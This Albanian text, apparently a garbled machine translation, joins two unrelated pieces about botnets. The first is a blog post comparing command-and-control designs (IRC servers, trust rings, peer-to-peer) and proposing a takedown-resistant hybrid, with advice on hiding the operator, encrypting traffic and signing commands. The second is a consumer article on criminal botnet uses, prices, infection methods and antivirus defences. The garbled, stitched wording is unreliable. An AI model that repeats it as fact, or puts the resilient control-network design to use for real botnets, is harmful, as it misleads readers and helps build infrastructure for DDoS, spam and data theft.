Botnet. Si janë krijuar botnet. Mbrojtja e mjeteve kundër botneve. Krijo kontrollin tuaj Botnet Control nëpërmjet një rrjeti IRC

Nuk është çudi që kam botuar një projekt të shënimit tim për rrjetet e kolegëve. Komentet lexuesit doli të jenë shumë të dobishme. Ata më frymëzuan për punë të mëtejshme në këtë drejtim. Çfarë ndodhi nga kjo - shikoni nën prerjen.

Siç mund të shihet nga emri i postit, sot do të diskutohet vetëm për botnet. Rreth ndarjes së skedarëve, rrjeteve proxy, peegbogs dhe monedhës p2p për një kohë të harruar.

Nën fjalën "botnet" nuk duhet të kuptohet diçka e paligjshme. Kur përdoruesi vullnetarisht shkarkon dhe instalon "bot" në mënyrë që të sakrifikojë trafikun e saj dhe burimet informatike për nevojat e projektit shkencor, është gjithashtu botnet. Prandaj, Botmaster nuk është domosdoshmërisht një kriminel. Një grup prej 30 shkencëtarë të përfshirë në projektin shkencor është gjithashtu "Botmaster".

1. Kontrolli i BotTNet nëpërmjet serverit

Mënyra më e lehtë për të kontrolluar bots është të filloni serverin IRC / HTTP. Nëpërmjet tij, bots do të marrin komanda dhe me ndihmën e saj për të dërguar rezultatin e ekzekutimit të tyre.

Unë tërheq, si unë mund të :) Në këtë rast, ilustrimi nuk mund të kërkohet, por unë vendosa t'ju përgatis për të shokuar, i cili do të prodhojë fotografi të tjera.

  • Zbatimi shumë i thjeshtë, veçanërisht në rastin e IRC.
  • Bots të shpejtë të përgjigjes.
  • Ju mund të jepni komanda si të gjithë rrjetin dhe një bot të veçantë.
  • Nëse rrjeti përbëhet nga qindra nyje, një kanal në Dalnet është e mjaftueshme për ta menaxhuar atë. Për rrjetet, mund të jetë më e madhe në kosto të ulët (rreth 300 rubla / muaj) web hosting.
  • Në rastin e httpTheserver është thjeshtuar nga zhvillimi i një UI të bukur. Kjo është e rëndësishme nëse përdorim botnet në disa shërbime në internet.
  • Ngarkoni në server. Numri i nyjave në botnet më të mëdha matet me miliona. Për të kontrolluar një turmë të tillë, një server është i vogël.
  • Nëse diçka ndodh në server (aksidenti në rrjet, DDOS, një zjarr në qendrën e të dhënave), rrjeti do të përfundojë.
  • Një server është i lehtë për t'u nisur. Kjo mund të bëhet si ofruesi dhe produktet e laboratorit Kaspersky në një kompjuter përdorues.
  • Botmaster është relativisht i lehtë për t'u gjetur. Pasi harroi për VPN - prisni për mysafirët në zinxhirë.
  • Në rastin e IRCEkipet marrin vetëm bots online. Nëse bot shkon në kanal për dy minuta pas dërgimit të ekipit, do të jetë "jo në këtë temë".
  • Numri i bots dhe IP e tyre mund të përcaktohen duke shkuar në kanalin IRC. Fjalëkalimi i mbrojtjes së kanaleve nuk do të ndihmojë, sepse ky i fundit është i lehtë për të gërmuar nga kodi bot.

2. Menaxhimi përmes rrjetit IRC

Një hap logjik për të luftuar minuset e metodës së mëparshme nuk është një server, por disa. Sipas mendimit tim, mënyra më e lehtë për të bërë është, duke hequr rrjetin tuaj IRC. Në këtë rast, të gjitha përgjegjësitë për transferimin e të dhënave ndërmjet serverëve bie në protokollin IRC. Nga ana e bots nuk do të ketë dallim në krahasim me vendimin e mëparshëm.

  • Zbatimi i thjeshtë, megjithëse duhet të ballafaqoheni me konfigurimin e serverëve.
  • Bots ende reagojnë shpejt për ekipet.
  • Ju ende mund të jepni komanda për një bot të veçantë.
  • Shpërndarjen e ngarkesës midis serverëve, mbrojtjes kundër ddos \u200b\u200bdhe forcës madhore. Dhjetëra serverë të mirë mund të jenë të mjaftueshme për një rrjet nga një milion bots.
  • Nëse refuzoni një pjesë të serverëve, ju mund t'i zëvendësoni ato me ta.
  • Nëse IRC është përdorur Dhe ngatërroni një mijë bots ulur në të njëjtin kanal, përdorni disa kanale. Prandaj, ju mund të jepni detyra të ndryshme në pjesë të ndryshme të rrjetit.
  • Ne do të duhet të dalim në server / VDS.
  • Ju mund të blini të gjithë serverët në të njëjtën kohë dhe Botmaster nuk do të ketë kohë për t'i zëvendësuar ato.
  • Botmaster është ende e lehtë për të gjetur.
  • Në rastin e IRC, numri i bots dhe ip i tyre është ende në sy.
  • Bots të cilët sapo kanë hyrë në kanalin, jo në këtë temë.

Termi Tresting (Unaza e Trustit, Rrethi / Ring Trust) Së pari dëgjova nga shoku nickolas në komentet në shënimin e mëparshëm. Është gati të besojë "serverët" të funksionojnë në një pjesë të botnet.

  • Asnjë server nuk ka nevojë.
  • Tresting mund të përbëhet nga qindra nyje. Ngritja dhe kontrolli i një numri të tillë të serverëve IRC / HTTP nuk është e lehtë.
  • Bots nuk duhet vazhdimisht të mbajnë lidhjen me turneun. Mjafton të kontrolloni çdo 5-10 minuta nëse nuk shfaqen komanda të reja. Çdo ekip duhet të ketë TTL gjatë së cilës është ruajtur në turne.
  • Një numër i madh i "serverëve" sigurojnë stabilitetin e rrjetit në të gjitha llojet e fatkeqësive. Kur një pjesë e unazës është e pazgjidhur, Botmaster mund të japë një ekip për krijimin e një tart të ri. Ose mund të bëjë nyjet e unazave (keni nevojë për nënshkrime digjitale dhe pëlqimin e një përqindjeje të caktuar të truds).
  • Le provë të përbëhet nga 512 nyje, të paktën 50% janë vazhdimisht në internet. Nëse ka 1.000.000 bots në rrjet dhe secila prej tyre është vazhdimisht në internet, më pak se 4,000 bots kanë më pak se 4,000 bots. Kur nxitet nga komandat bot (ose kur dërgoni rezultatin) çdo 10 minuta, çdo nyje unazë do të përpunojë njëkohësisht një mesatare prej 7 komponimeve. Pak për rrjetin e kësaj madhësie, apo jo?
  • Vetëm Botmaster mund të marrë listën e saktë të të gjithë Botmaster.
  • Ju mund të jepni komanda një bot ose grup të veçantë botash.
  • Reagimi i shpejtë i shisheve ndaj ekipeve.
  • Botmaster është e vështirë për t'u gjetur.

I vetmi minus, të cilin e shoh është kompleksiteti i zbatimit.

4. Rrjetet e Pirography

Nëse ju besoni burimet e internetit, p2p botnet janë aktualisht shumë të popullarizuara. Ndër këto burime ka vëmendje më të madhe. Çdo nyje e një rrjeti të tillë di vetëm disa nyje "fqinje". Botmasteri dërgon komanda në disa nyje të rrjetit, pas së cilës transmetohet nga fqinji tek fqinji.

Lista e fqinjëve lëshohet për bots një herë në një server të veçantë. Mund të jetë, për shembull, faqe e hackuar. Më shumë server nuk bën asgjë, është e nevojshme vetëm gjatë shtimit të nyjeve në botnet.

  • Zbatimi është disi më i lehtë se sa në paragrafin e mëparshëm.
  • Ngarkesa minimale në të gjitha nyjet e rrjetit. Madhësia e botnetit është pothuajse e pakufizuar.
  • Rezistenca ndaj DDOS, shkyçja e nyjave dhe kështu me radhë. P2P-Botnet është pothuajse e pamundur për të nisur.
  • Nuk ka lidhje të përhershme, si në rastin e IRC.
  • Nevojë për një server, megjithëse jo për një kohë të gjatë.
  • Nyjet nga koha në kohë vdesin, gjë që ndikon në lidhjen e rrjetit.
  • Për të marrë një listë të të gjitha bots, ju duhet, për shembull, t'u jepni atyre një komandë për t'iu referuar një vendi të caktuar. Në këtë rast, nuk ka asnjë garanci se lista do të marrë vetëm botmaster.
  • Për të dhënë një komandë për një nyje të caktuar, ju duhet të dërgoni atë të gjithë rrjetin, ose të lidheni me nyjen direkt.
  • Bots ngadalshëm reagues për ekipet.
  • Për shembull, për të dërguar një komandë "të gjatë", me një listë URL, ju duhet të përdorni një server të palëve të treta, përndryshe bots do të ngadalësohen edhe më shumë.
  • Botmaster është më e lehtë për të gjetur se në shembullin e mëparshëm, për shkak të përdorimit të çdo serveri.

Natyrisht, unë mund të jem i gabuar, por sipas mendimit tim P2P-botnet është shumë më i keq se tart. Ndoshta prodhuesit e antiviruseve për diçka të heshtur?

5. Zgjidhje gjithëpërfshirëse

Një mënyrë për të shpikur diçka të re dhe të mirë - kaloi diçka të vjetër. Kombinuar telefonin, kompjuter, regjistrues kasetë, kamera dhe videokamera - mori një smartphone. Askush nuk do të jetë i befasuar nga kompjuteri dhe kontrolli i klimës në makinë. Ne zam për çdo magnet kose në frigorifer, dhe shitja të marrë jashtë.

Është e rëndësishme të mbani mend se me kalimin e pasuksesshëm nuk mund të marrim asgjë për asgjë. Kujton algoritme gjenetike, apo jo? Merrni, do të duket, një ide e mirë - P2P-Botnet, ku tërheqja është përgjegjëse për emërimin e fqinjëve. Pastaj nuk kemi nevojë për ndonjë server!

Por në këtë rast, kompleksiteti i zbatimit do të rritet, megjithëse pak. Problemet e mbetura P2P botnet do të mbeten të pazgjidhura. Fitimi është i parëndësishëm, llogaria 1: 1.

Disa të ulur me një copë letre dhe laps, unë lindi idenë e mëposhtme. Sa i di unë, ajo nuk e kishte shprehur kurrë më parë, dhe unë jam i pari që erdhi. CHSV plus 100.

Se nëse rrjeti ka dy shtete - "aktive" dhe "pasiv". Në gjendje pasive, botnet punon sipas skemës P2P. Botmaster dërgon komandën për të "mobilizuar trupat" dhe rrjeti kthehet në një mijë. Në ekipin e tij, Botmaster duhet të specifikojë nyjet e turneut dhe kohën për të cilën rrjeti ndryshon gjendjen e saj. Kështu që unaza ishte më shumë, ju mund të jepni një ekip në disa bots për të thirrur fqinjët tuaj. Më tej, të gjitha komandat transmetohen përmes turneut. Ai është përgjegjës për emërimin e nyjeve të reja "fqinjët". Nëse unazat TTL më vonë do të dalin të mjaftueshme, ju mund të jepni komandën e "shtrirjes së shtetit aktiv".

Një botnet i tillë nuk trashëgon një rrjet të vetëm minus P2P dhe do të ketë të gjitha avantazhet e tart, si dhe:

  • Rritja e stabilitetit në sulmet e DDOS dhe filtrat e rrjetit, si rrjeti P2P.
  • Konsumi minimal i burimeve nga bots gjatë joproduktive të rrjetit. Botmaster nuk ka nevojë të gjurmojë statusin e majës dhe të zgjedhë nyje të reja për të.
  • Kur krijoni auto, vetëm ato nyje janë zgjedhur që aktualisht online. Bots do të lidhen me unazën nga përpjekja e parë (për një kohë).
  • Lista e "fqinjëve" është përditësuar në mënyrë periodike. Të gjitha nyjet e njëjta IP të përfshira në unazën e përkohshme e di gjithë botnet. Pra, le këto nyje të konsiderojnë këto nyje, nëse një pjesë e fqinjëve të vërtetë nuk është shfaqur në rrjet për një kohë të gjatë.

Dhe e vetmja pengesë që unë shoh këtu është kompleksiteti i zbatimit. Por nuk është me të vërtetë një problem.

6. Çfarë është e rëndësishme për të kujtuar

Deri tani, hesht për disa pika, sepse ato janë të qenësishme në ndonjë nga emrat e metodave të kontrollit të botnet. Kujdes duhet të fokusohet në to.

  • Një pjesë e nyjeve nuk mund të marrin lidhje hyrëse për shkak të firewall ose nat. Në minimum, është e nevojshme të merret parasysh kur shkruani një bot. Për shembull, kur shpërndan komandat në rrjetin P2P, bot duhet të jetë në gjendje të hyjë periodikisht vetë fqinjët dhe të mos presë për ekipin prej tyre.
  • Duhet të procedohet nga fakti që të gjitha komandat e dërguara nga rrjetet janë dëgjuar. Në minimum, personi i interesuar mund të modifikojë kodin bot për këto qëllime. Megjithatë, ka kuptim për të encrypt të gjithë trafikun e transmetuar në rrjet. Në minimum, ajo do të komplikojë analizën e botnet.
  • Të gjitha komandat botmaster duhet të nënshkruhen me një nënshkrim dixhital. Fjalëkalimet nuk janë të përshtatshme, sepse ato mund të interceptohen.
  • Pasi të ndodhë në zbatimin, unë vërej se të paktën tre skuadra duhet të sigurohen në çdo botnet - përditësimin e Botmasterit, përditësimin kryesor të Botmasterit dhe vetë-shkatërrimin e të gjithë rrjetit.
  • Rrjeti ka nyje "spyware". Disa prej tyre janë të përfshira në turne. Në të njëjtën kohë, ne nuk i dimë qëllimet se këto "spiunë" janë ndjekur - kjo mund të jetë përkufizimi i IP të Botmaster, duke thyer ekzekutimin e ekipeve, tooltit rrjetin, marrjen e kontrollit mbi botnet dhe kështu me radhë. Në veçanti, kjo do të thotë se bots duhet të zgjedhin një nyje të rastit kur lidhet me unazën, dhe të mos përdorë gjatë gjithë kohës.
  • Në figurë, nyjet e addstration janë të lidhura secila me secilën, por shumë më praktike për të realizuar unazën në formën e një rrjeti të vogël P2P, domethënë sipas parimit "fqinjët".

Gjithashtu vini re se zgjidhjet 1 dhe 2 (server, shumë servera) janë të privuar nga shumë minuse dhe marrin disa avantazhe nga zgjidhja e 3 (besimit) kur përdorin protokollin HTTP. Shkoni nëpër këto artikuj përsëri për të kuptuar atë që jam.

7. PËRFUNDIME

Për rrjetet e vogla, përdorimi i IRC është një zgjidhje e mirë. Për shembull, nëse doni të krijoni rrjetin tuaj të vogël për informatikë të shpërndarë, instaloni bot në kompjuterin tuaj në shtëpi, laptop, netbook, kompjuterin e punës (nëse lejon politikën e kompanisë) dhe menaxhoni rrjetin nëpërmjet DalNet. Nëse keni nevojë, më vonë, rrjeti mund të jetë "pompimi" në tart. Ju e ndjekni komandën e duhur, apo jo?

Nëse një ndërfaqe e bukur e internetit është e nevojshme për botnet, mund të ketë kuptim për të shkruar një program shtesë që do të marrë komanda nga serveri i uebit dhe t'i dërgoni ato në IRC. Të paktën e konsiderojnë këtë qasje.

Zgjidhje universale - kjo është një turne dhe p2p + tresting. Rrjete të tilla do të punojnë në mënyrë të përkryer pavarësisht se sa nyje në to, 1 ose 1.000.000, pa asnjë server.

Duke pasur parasysh praninë e mangësive të dukshme në "P2P të pastër" në krahasim me unazën, mbetet e paqartë se pse konsiderohet si një zgjidhje e mirë. Sigurisht në bots nga të cilat rrjeti përbëhet, ka shumë karakteristika të dobishme. Pse të mos shtoni një ngarkesë më të vogël - mobilizoni rrjetin në turne?

Këtu, ndoshta, të gjithë. Unë do të jem i lumtur për të gjithë komentet tuaja. Sidomos me kritikat, udhëzimet mbi pasaktësitë / kontradiktat në tekst dhe idetë tuaja në lidhje me temën e ngritur.

Sot, botnet u bënë një nga mjetet kryesore të krimit kibernetik. Computerbild do të tregojë se çfarë botnet janë se si ata punojnë dhe si për të ruajtur kompjuterin tuaj nga marrja në rrjetin zombie.

Një botnet, ose një rrjet zombie, është një rrjet i kompjuterave të infektuar me një program me qëllim të keq që u lejon sulmuesve të menaxhojnë në distancë njerëzit e tjerë pa dijeninë e pronarëve të tyre. Në vitet e fundit, rrjeti zombie është bërë një burim i qëndrueshëm i të ardhurave për kriminelët kibernetikë. Ekzistojnë vazhdimisht kosto të ulëta dhe një minimum të njohurive të nevojshme për kontrollin e botnets, të kontribuojnë në rritjen e popullaritetit, dhe kështu numri i botnets. Në sulmet e DDOS ose postimet e spamit, të kryera me rrjetet zombie, sulmuesit dhe klientët e tyre fitojnë mijëra dollarë.

A është kompjuteri im i infektuar me një bot?

Përgjigjja Kjo pyetje nuk është e lehtë. Fakti është se për të ndjekur ndërhyrjen e bots në punën e përditshme të PC është pothuajse e pamundur, pasi ajo nuk ndikon në shpejtësinë e sistemit. Megjithatë, ka disa shenja për të cilat është e mundur të përcaktohet se një bot është i pranishëm në sistem:

Programet e panjohura po përpiqen të lidhen me internetin, të cilat periodikisht shqetësojnë softuerin e firewall ose antivirus;

Trafiku i internetit bëhet shumë i madh, edhe pse e përdorni rrjetin shumë të moderuar;

Në listën e proceseve të sistemit të drejtimit, të reja, maskimi për proceset e zakonshme të Windows-it shfaqen (për shembull, bot mund të veshin emrin scvhost.exe - ky emër është shumë i ngjashëm me emrin e procesit të sistemit të Windows Svchost.exe; është mjaft Vështirë të vërehet ndryshimi, por është e mundur).

Pse janë krijuar botnet

Batnet janë krijuar për të fituar para. Ju mund të zgjidhni disa fusha të përdorimit komercialisht të favorshëm të zombies: sulmet e DDOS, mbledhjen e informacionit konfidencial, spam postimi, phishing, kërko spam, cheating klikoni kundërvihet, etj. Duhet të theksohet se çdo drejtim do të jetë fitimprurës, çdo lloj sulmuesi nuk do të jetë Zgjidhni, dhe botnet lejon të gjitha aktivitetet e listuara në të njëjtën kohë.

Sulmi i DDO-ve (nga anglishtja e shërbimit të shpërndarë) është një sulm në një sistem kompjuterik, për shembull, në një faqe interneti, qëllimi i të cilit është të sjellë sistemin në "rënien", domethënë shtetet kur ajo është nuk mund të marrë dhe të përpunojë kërkesat për përdoruesit e ligjshëm. Një nga metodat më të zakonshme të sulmit DDOS është të dërgojë kërkesa të shumta në një kompjuter ose një vend të sakrificës, e cila çon në një refuzim të mirëmbajtjes nëse burimet e kompjuterit të sulmuar të kompjuterit nuk janë të mjaftueshme për të trajtuar të gjitha kërkesat hyrëse. Sulmet e DDOs janë armë të frikshme hacker, dhe botnet është një mjet ideal për mbajtjen e tyre.

Sulmet e DDOS mund të jenë të dyja një mjet për luftë konkurruese të padrejtë dhe veprime të kibernetit. Pritësi i botnet mund të ketë një shërbim për këdo që nuk është një sipërmarrës shumë i përgjegjshëm - për të mbajtur një sulm ddos \u200b\u200bnë vendin e konkurrentit të saj. Burimi i sulmuar pas një ngarkese të tillë "do", klienti i sulmit do të marrë një avantazh të përkohshëm, dhe krimi kibernetik është një shpërblim modest (ose jo shumë).

Në të njëjtën mënyrë, vetë pronarët e botnet mund të përdorin sulmet e DDOS për të zhvatur para nga kompanitë e mëdha. Në të njëjtën kohë, kompanitë preferojnë të përmbushin kërkesat e krimit kibernetik, pasi që eliminimi i pasojave të sulmeve të suksesshme të DDO-ve është shumë e shtrenjtë. Për shembull, në janar të vitit 2009, një nga hosterët më të mëdhenj të GoDaddy.com i është nënshtruar një sulmi DDO, si rezultat i të cilave mijëra vende të postuara në serverat e saj dolën të jenë të paarritshme për pothuajse një ditë. Humbjet financiare të Hoster ishin të mëdha.

Në shkurt të vitit 2007, u mbajtën një sërë sulmesh në serverët e rrënjës DNS, funksionimi normal i të gjithë Internetit varet direkt nga operacioni. Nuk ka gjasa që qëllimi i këtyre sulmeve ishte rënia e rrjetit mbarëbotëror, sepse ekzistenca e rrjeteve të zombies është e mundur vetëm nën kushtin që ka dhe normalisht funksionon në internet. Shumica e të gjitha ishin të ngjashme me demonstrimin e forcës dhe mundësive të rrjeteve të zombies.

Shërbimet e reklamimit për zbatimin e sulmeve të DDOS-it të postuara hapur në shumë forume të temave përkatëse. Çmimet e sulmeve luhaten nga 50 në disa mijë dollarë në ditë të operacionit të vazhdueshëm ddos-botnet. Sipas faqes www.shadowserver.org, për vitin 2008, u mbajtën rreth 190 mijë sulme ddos, në të cilat kriminelët kibernetikë ishin në gjendje të fitonin rreth 20 milionë dollarë. Natyrisht, kjo shumë nuk përfshin të ardhurat nga shantazhi, i cili thjesht e pamundur për të llogaritur.

Mblidhni informacionin konfidencial

Informacioni konfidencial që ruhet në kompjuterët e përdoruesve gjithmonë do të tërheqë ndërhyrës. Numrat e kartës së kreditit, informacionet financiare dhe fjalëkalimet për shërbime të ndryshme janë interesi më i madh: kutitë postare, serverat FTP, "lajmëtarë" dhe të tjerët. Në të njëjtën kohë, programet moderne të dëmshme lejojnë sulmuesit të zgjedhin pikërisht të dhënat që janë interesante - për këtë është e mjaftueshme për të shkarkuar modulin përkatës të PC.

Meshkujve mund të shesin informacionin e vjedhur ose ta përdorin atë në interesat e tyre. Një qindra reklama për shitjen e llogarive bankare shfaqen në forume të shumta online. Kostoja e llogarisë varet nga shuma e parave në llogarinë e përdoruesit dhe varion nga 1 në $ 1,500 për shkak të. Kufiri më i ulët sugjeron që gjatë luftës konkurruese, kibernetikë të përfshirë në këtë lloj biznesi janë të detyruar të ulin çmimet. Për të fituar më shumë se shumë, ata kanë nevojë për një fluks të qëndrueshëm të të dhënave të freskëta, dhe për këtë, kërkohet një rritje e qëndrueshme e rrjeteve zombie. Sidomos Informacione Financiare Financiare Cardiers - sulmuesit e angazhuar në kartat bankare të rreme.

Sa i përket operacioneve të tilla, është e mundur të gjykohet historia e njohur me një grup kibernetikët brazilianë, të cilët u arrestuan dy vjet më parë. Ata ishin në gjendje të heqin përdoruesit e zakonshëm nga llogaritë bankare prej 4.74 milionë dollarë duke përdorur informacionin e vjedhur me kompjuterë. Në blerjen e të dhënave personale që nuk kanë një marrëdhënie të drejtpërdrejtë me paratë e përdoruesit dhe kriminelët të cilët janë të angazhuar në dokumente të rreme, hapjen e llogarive bankare të rreme, duke kryer transaksione të paligjshme etj.

Një lloj tjetër informacioni i mbledhur nga Battnets është adresa e-mail, dhe, ndryshe nga numrat e kartës së kreditit dhe llogaritë, një shumëllojshmëri adresash e-mail mund të mësohen nga libri i adresave të një kompjuteri të infektuar. Adresat e mbledhura ekspozohen për shitje, dhe nganjëherë "për peshë" - një më të varfër. Blerësit kryesorë të një "produkti" të tillë janë spammers. Lista e një milion e-mail adreson shpenzimet nga 20 në 100 dollarë, dhe buletini i urdhëruar në të njëjtat milion adresa është 150-200 dollarë. Përfitimi është i qartë.

Kriminelët janë gjithashtu të interesuar për llogaritë për shërbime të ndryshme të paguara dhe dyqane online. Natyrisht, ata janë më të lirë se llogaritë bankare, por zbatimi i tyre është i lidhur me një rrezik më të vogël të persekutimit nga agjencitë e zbatimit të ligjit.

Miliona mesazhe spam drejtuar çdo ditë në mbarë botën. Mailing e një postë të padurueshme është një nga funksionet kryesore të botnets moderne. Sipas Kaspersky Lab, rreth 80% e të gjithë spam është dërguar përmes rrjetit zombie. Miliarda letra me reklamat "Viagra", kopjet e orëve të shtrenjta, kazinove online, etj, janë dërguar nga folësit e "Viagra", kopjet e orëve të shtrenjta, kazinove online, etj. Kështu, hakerët vënë nën grushtin e kompjuterëve në çdo përdorues tjetër: adresat nga të cilat shpërndarja është kryer në listat e zeza të kompanive antivirus.

Në vitet e fundit, sfera sfera sfera është zgjeruar: ICQ spam, spam në rrjetet sociale, forumet, bloget u shfaqën. Dhe kjo është gjithashtu një "meritë" e pronarëve të botnet: në fund të fundit, është krejtësisht e lehtë të shtosh një modul shtesë në klientin bot, duke hapur horizontet për biznesin e ri me slogane si "Spam në Facebook. Të lira. " Çmimet e spamit ndryshojnë në varësi të audiencës së synuar dhe numrit të adresave në të cilat kryhet shpërndarja. Kryqëzimi i çmimeve për objektivat - nga 70 dollarë mbi qindra mijëra adresa deri në $ 1,000 për disa dhjetëra miliona adresa. Gjatë vitit të kaluar, spammers fituan rreth 780 milionë dollarë për dërgimin e letrave.

Krijimi i një spam kërkimi

Një tjetër mundësi për të përdorur botnet është rritja e popullaritetit të vendeve në motorët e kërkimit. Duke punuar në optimizimin e motorëve të kërkimit, administratorët e burimeve po përpiqen të rrisin pozicionin e faqes në rezultatet e kërkimit, pasi sa më i lartë, aq më shumë vizitorë shkojnë në vend përmes motorëve të kërkimit dhe prandaj më shumë do të jenë të ardhurat e faqes Pronari, për shembull, shitjen e hapësirës reklamuese në faqet e internetit. Shumë kompani paguajnë shumë para për të zotëruesit e internetit në mënyrë që ata të sjellin faqen në pozicionin e parë në "motorët e kërkimit". Pronarët e Botnetit vëzhguan disa nga teknikat e tyre dhe automatizuan procesin e optimizimit të motorëve të kërkimit.

Kur shihni në komentet në rekordin tuaj në "Journal Live" ose një foto të suksesshme të paraqitur në hosting foto, shumë lidhje të krijuara nga personi i panjohur për ju, dhe nganjëherë "mik" tuaj - nuk është i befasuar: vetëm dikush Urdhëroi promovimin e burimit tuaj tek pronarët botnet. Një program i krijuar posaçërisht është i ngarkuar në një kompjuter mumje dhe në emër të pronarit të saj lë komente mbi burimet popullore duke iu referuar vendit tjerrje. Çmimi mesatar për shërbimet e spamit të kërkimit të paligjshëm është rreth 300 dollarë në muaj.

Sa kushton të dhënat personale

Kostoja e të dhënave personale të vjedhura direkt varet nga vendi në të cilin jeton pronari i tyre ligjor. Për shembull, të dhënat totale të banorit amerikan janë 5-8 dollarë. Në tregun e zi, këta banorë të Bashkimit Evropian vlerësohen veçanërisht - ato janë dy deri tre herë më të shtrenjta se të dhënat e qytetarëve amerikanë dhe Kanadasë. Kjo mund të shpjegohet me faktin se të dhënat e tilla të të dhënave mund të gëzojnë në çdo vend të përfshirë në BE. Mesatarisht, çmimi i një pako të plotë të të dhënave të një personi është rreth 7 dollarë.

Për fat të keq, për atë që vendosi "nga e para" për të organizuar një botnet, nuk do të jetë shumë vështirësi në gjetjen e një udhëzimi për krijimin e një rrjeti zombie në internet. Hapi i parë: Krijo një rrjet të ri zombie. Për ta bërë këtë, infektoni përdoruesit e përdoruesve me një program të veçantë - bot. Për infeksion, postime spam, postimi i mesazheve në forume dhe rrjete sociale dhe teknika të tjera; Shpesh bot është i pajisur me një funksion të vetë-përhapjes si viruse ose krimba.

Për të bërë një viktimë të mundshme për të krijuar një bot, përdorni teknikat e inxhinierisë sociale. Për shembull, ofrohet për të parë një video interesante, e cila kërkon shkarkimin e një kode të veçantë. Pas shkarkimit dhe fillimit të një skedari të tillë, përdoruesi, sigurisht, nuk do të jetë në gjendje të shohë ndonjë video dhe ka shumë të ngjarë të mos vërejnë ndonjë ndryshim në të gjitha, dhe kompjuteri i tij do të infektohet dhe të bëhet një shërbëtor i nënshtruar që kryen të gjitha komandat e Host e botnet.

Metoda e dytë e përdorur gjerësisht e infeksionit me bots është makinë-by-download. Kur vizitoni faqen e internetit të infektuar të përdoruesit në kompjuterin e saj përmes "vrimave" të ndryshme në aplikacione - Para së gjithash në shfletues të popullarizuar - Kodi me qëllim të keq është ngarkuar. Për funksionimin e dobësive, përdoren programe të veçanta - shfrytëzon. Ata lejojnë jo vetëm të shkarkuar në mënyrë të padukshme, por gjithashtu të nisësh një virus ose bot. Ky lloj i përhapjes malware është më i rrezikshmi, sepse nëse një burim popullor është hacked, dhjetëra mijëra përdorues do të plagosen!

Bot mund të jetë i hipnotizuar nga vetë-përhapja në rrjetet kompjuterike. Për shembull, mund të shpërndahet duke infektuar të gjitha skedarët e ekzekutueshëm në dispozicion ose duke kërkuar dhe infektuar me kompjuterë të rrjetit të prekshëm.

Kompjuterët e infektuar. Asgjë nuk dyshon se krijuesi i botnet mund të kontrollohet duke përdorur Qendrën e Komandës Botnet, të detyrueshme për bots nëpërmjet kanalit IRC, një lidhje interneti ose duke përdorur ndonjë mjet tjetër në dispozicion. Është e mjaftueshme për të kombinuar disa makina duzina në rrjet në mënyrë që botnet filloi të sjellë të ardhura për mjeshtrin e saj. Për më tepër, këto të ardhura janë në varësi lineare nga stabiliteti i rrjetit të zombies dhe normat e saj të rritjes.

Kompanitë e reklamave që operojnë në internet sipas skemës PPC (Pay-per-click) paguajnë para për klikime unike në lidhjet në reklamat e postuara në internet. Për pronarët e pagëzimit, mashtrimi i kompanive të tilla është një profesion fitimprurës. Për shembull, ju mund të merrni një rrjet të njohur të Google Adsense. Reklamuesit e përfshirë në të janë duke paguar Google për klikimet në reklama të postuara me shpresën se përdoruesi që dukej "në dritë" do të blejë diçka prej tyre.

Google në anën tjetër vendos reklamimin kontekstual në vende të ndryshme të përfshira në programin AdSense, duke paguar përqindjen e pronarit të faqes nga secili klikim. Mjerisht, jo të gjithë pronarët e vendeve janë të ndershme. Duke pasur një rrjet zombie, një hacker mund të gjenerojë mijëra klikime unike në ditë - një me çdo makinë, në mënyrë që të mos shkaktojë dyshime të veçanta të Google. Kështu, paratë e shpenzuara në kompaninë reklamuese do të rrjedhin në një xhep për hakerin. Për fat të keq, nuk kishte një rast të vetëm kur dikush u tërhoq për aksione të tilla. Sipas Forenzikës së Klikut, në vitin 2008, rreth 16-17% e të gjitha përkthimeve në lidhje reklamuese ishin të falsifikuara, nga të cilat e treta u krijua nga një botnet. Pas kryerjes së llogaritjeve të pakomplikuara, mund të kuptohet se vitin e kaluar pronarët e botnets "mbërthyer" 33,000,000 dollarë. Jo të ardhura të këqija nga klikimet me miun!

Sulmuesit dhe të papastët në dorë biznesmenët nuk janë domosdoshmërisht duke krijuar një botnet "nga e para". Batnets e madhësive të ndryshme dhe performancës që ata mund të blejnë ose të marrin me qira nga hakerat - për shembull, duke kontaktuar forume të specializuara.

Kostoja e botnet e përfunduar, si dhe kostoja e qirasë së saj, varet drejtpërsëdrejti nga numri i kompjuterëve të përfshirë në të. Popullariteti më i madh i botnets të gatshme gëzojnë në forume anglishtfolëse.

Batnets pak, të përbërë nga disa qindra bots, kushtojnë nga 200 në 700 dollarë. Në të njëjtën kohë, çmimi mesatar i një bot është rreth 50 cent. Botnet më të mëdha janë para të mëdha.

Rrjeti Zombie Shadow, i cili u krijua disa vjet më parë nga një haker 19-vjeçar nga Holanda, kishte më shumë se 100 mijë kompjutera të vendosur në mbarë botën, të shitur për 25,000 euro. Për këto para mund të blini një shtëpi të vogël në Spanjë, megjithatë, krimineli nga Brazili preferonte të fitonte një botnet.

Mjetet e mbrojtjes kundër botnets

1. Para së gjithash, këto janë programe analiale dhe paketa gjithëpërfshirëse për të mbrojtur kundër kërcënimeve të internetit me baza të përditësuara rregullisht. Ata do të ndihmojnë jo vetëm për të zbuluar rrezikun në kohë, por edhe për të eliminuar atë para se zombie juaj të kthejë "mikun hekuri" besnik do të fillojë të dërgojë faqet e spam ose "rënie". Paketa gjithëpërfshirëse, të tilla si Kaspersky Internet Security 2009, përmbajnë një grup të plotë të funksioneve mbrojtëse, të cilat mund të menaxhohen përmes një qendre të përbashkët komanduese.

Moduli anti-virus në sfond kryen skanimin e zonave më të rëndësishme të sistemit dhe kontrollon të gjitha mënyrat e mundshme për të pushtuar viruset: bashkëngjitjet e postës elektronike dhe faqet e internetit potencialisht të rrezikshme.

Firewall monitoron shkëmbimin e të dhënave në mes të një kompjuteri personal dhe internetit. Ai kontrollon të gjitha paketat e të dhënave të marra nga rrjeti ose të dërgohen në aty, dhe nëse është e nevojshme, bllokon sulmet e rrjetit dhe parandalon dërgimin e fshehtë të të dhënave personale në internet.

Filtri i spamit mbron kutinë postare nga depërtimi i mesazheve reklamuese. Detyra e tij gjithashtu përfshin identifikimin e letrave të phishing, me ndihmën e të cilave sulmuesit po përpiqen të durojnë informacionin për të dhënat e saj për të hyrë në pagesa online ose sisteme bankare.

2. Përditësimi i rregullt i sistemit operativ, shfletuesit e internetit dhe aplikacionet e tjera, zhvilluesit e të cilëve zbulojnë dhe eliminojnë shumë bare në mbrojtjen e tyre, si dhe dobësitë e përdorura nga ndërhyrës.

